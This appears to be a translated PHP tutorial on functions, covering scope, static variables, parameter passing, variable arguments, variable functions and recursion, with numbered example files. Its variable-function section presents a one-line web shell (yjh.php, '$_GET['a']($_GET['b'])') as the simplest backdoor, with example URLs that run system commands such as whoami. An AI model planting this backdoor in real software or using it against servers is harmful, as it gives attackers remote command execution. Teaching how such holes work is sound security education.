table of Contents
1. Pass parameters by value (default method)
4. Variable function parameter list
Variable function (variable function)
The simplest backdoor (the simplest one-sentence Trojan): $a($b)
6.php (passing parameters by default/passing by reference)
8.php (variable function parameters)
yjh.php (the simplest backdoor)
Custom function
Code block
There is input, in most cases there is output
structure
function function name (parameter) {
Code block
return ;
}
note:
When a function is called, the actual parameters must be given to the formal parameters in order.
When the functions are called, they are independent of each other, and there is no connection by default.
After the execution is complete, return to the calling position and continue to execute downward.
Scope of PHP variables
Local variable
Variables defined inside the function
The scope of the variable is this function
Global variable
In PHP scripts, variables defined outside the function
The scope of the variable is the entire PHP script
Use global variables in functions?
1. Passing parameters
2. Statement
global
3. The scope of constants is super global (both inside and outside the function can be used)
<?php
$a=10;
define("NAME","AJEST")
function test(){
echo $a;
global $a;
echo $a;
echo NAME;
}
test();
?>
Static variable
Defined inside the function
Modified with static modifier
Only initialized when the function is first executed
Passing of parameters
1. Pass parameters by value (default method)
Operations on formal parameters will not affect actual parameters.
2. Pass by reference
It is equivalent to giving an alias to the actual parameter, and the operation of the formal parameter will affect the actual parameter.
3. Default parameters
If no actual parameters are passed to the function, take the default value
Suggestion: give all the default parameters
4. Variable function parameter list
func_get_arg ( int
$arg_num
) : mixed
func_get_args(); //
func_get_arg(); //According to the parameter offset, count from 0 to get the parameter
func_num_args(); //Get the number of parameters
Variable function (variable function)
The function is named as a variable and has a structure like this
$a($b)
It is also the simplest backdoor
Add parentheses directly after the variable-become a function
This kind of dynamic function is very dangerous. If the function name of this dynamic function is controllable and the parameters are controllable, we can directly command it arbitrarily. This is one of the principles of RCE (Remote Command/Code Execution Vulnerability)
We have some PHP statements that are not functions, such as print and echo. If you have to output, try printf. (Printf only has a string output function)
Then our system function will execute the string as a command
system — execute an external program and display the output
The simplest backdoor (the simplest one-sentence Trojan): $a($b)
Just two variable names are gone
<?php
$_GET['a']($_GET['b']);
?>
Enter in the URL: localhost/1.php ?a=system&b=ipconfig
(system — execute an external program and display the output)
Enter in the URL: localhost/1.php ?a=system&b=whoami
recursive function
Recursive function calls its own function inside the function
Source code
1.php
<?php
function userprint(){
echo "This is userprint Fun!";
}
function hello($name){
echo "Hello, ".$name;
}
function add($a,$b){
$c = $a + $b;
return $c;
}
userprint();
hello("GGG");
echo "<hr />";
echo add(1,2);
?>
2.php (local variable)
<?php
$a = 10;
function test(){
echo $a;
}
test();
echo "<hr />";
echo $a;
?>
3.php (global variables)
<?php
$a = 10;
define("NAME","GGG");
function test(){
echo $a;
global $a;
echo $a;
echo NAME;
}
test();
?>
4.php (static variable)
<?php
function test(){
static $a = 10;
echo ++$a."|";
}
test();
test();
test();
?>
5.php()
<?php
function A(){
echo "This is A fun!<hr />";
}
function B(){
echo "This is B fun!<hr />";
A();
echo "Fun B end!<hr />";
}
function C(){
echo "This is Fun C<hr />";
B();
echo "All Fun end<hr />";
}
C();
?>
6.php (passing parameters by default/passing by reference)
<?php
/*
function add($x){
echo ++$x;
}
*/
function add(&$x){
echo ++$x;
}
$a = 3;
add($a);
echo "<hr />";
echo $a;
?>
7.php (default parameters)
<?php
function add($a=2,$b){
echo $a+$b."<hr />";
}
add(10,20);
//add(4);
add (1,2,3,4,5);
?>
8.php (variable function parameters)
<?php
function test(){
//echo "This is :".__FUNCTION__;
echo func_num_args();//传参个数
echo "<br />";
echo func_get_arg(1);//根据参数偏移量,从零开始计数,获取参数值
echo "<br />";
for($i=0;$i<func_num_args();$i++){
echo func_get_arg($i)."|";
}
}
//test();
test("GGG",24,true,89.9);
echo "<br />";
?>
9.php (variable function)
<?php
function test1(){
echo "This is func".__FUNCTION__;
echo "<br />".func_get_arg(0);
}
function test2(){
echo "This is func".__FUNCTION__;
echo "<br />".func_get_arg(0);
}
//$a="test1";
//$a="test2";
//$a="var_dump";
//$a="echo"
//$a("GGG");//函数 函数名$abs test1("GGG")
//$a="printf";
$a ="system";
$a("ipconfig");
?>
yjh.php (the simplest backdoor)
<?php
$_GET['a']($_GET['b']);
?>
10.php (recursive function)
<?php
function test($n){
echo $n.' ';
if($n>0){
test($n-1);
}
else{
echo '<-->';
}
echo $n.' ';
}
test(3);//3 2 1 0 <-->0 1 2 3
?>